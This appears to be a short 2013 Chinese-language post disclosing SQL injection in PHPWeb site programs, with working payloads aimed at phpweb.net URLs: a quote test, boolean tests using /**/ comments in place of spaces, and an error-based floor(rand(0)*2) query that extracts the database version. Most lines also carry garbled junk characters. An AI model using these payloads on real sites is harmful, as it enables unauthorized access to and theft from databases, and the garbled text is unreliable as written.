phpweb所有的整站程序伪静态页面都存在sql注入& _9 R F' L r' x7 M
P$ G2 z' Z/ Q9 Y6 K$ U8 v主站:http://phpweb.net/' B( n: [9 g% S
加’检测:
; W8 b: j" q/ G; B6 P 6 @9 }1 r9 j9 l; F3 [4 z8 T
http://www.phpweb.net/down/html/?772′.html
$ t4 Q3 J5 x h: | 4 Q/ v' d- J- g! Z [3 u/ O
出错0 v& Q' u' R- R5 t/ w; L
存在注入。7 \! _4 J( c1 L* ]* ]7 {
不能用空格,只能用/*罗
6 z! K% A) y' t% I5 d5 r% Z3 Dhttp://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常( T2 j1 \0 p6 U$ v7 i
: g( A9 m* z) y6 D% u Y; L# l) fhttp://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.
. `9 `& ^( G# N6 j" V9 l+ X! i爆数据库版本:
9 J8 ~4 F5 d5 C7 J. `
- }. ^6 Y Q5 \: a" z- m( w" C?
/ u; ~2 |. o8 x; a4 p16 [8 r4 Z' B& q- P+ M% Q
http://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html
0 F8 E# P: h8 v. r/ I% h) f7 {8 k! `更新日期: 2013-01-03 13:39:50 7 ?; g" P6 x4 j5 k
|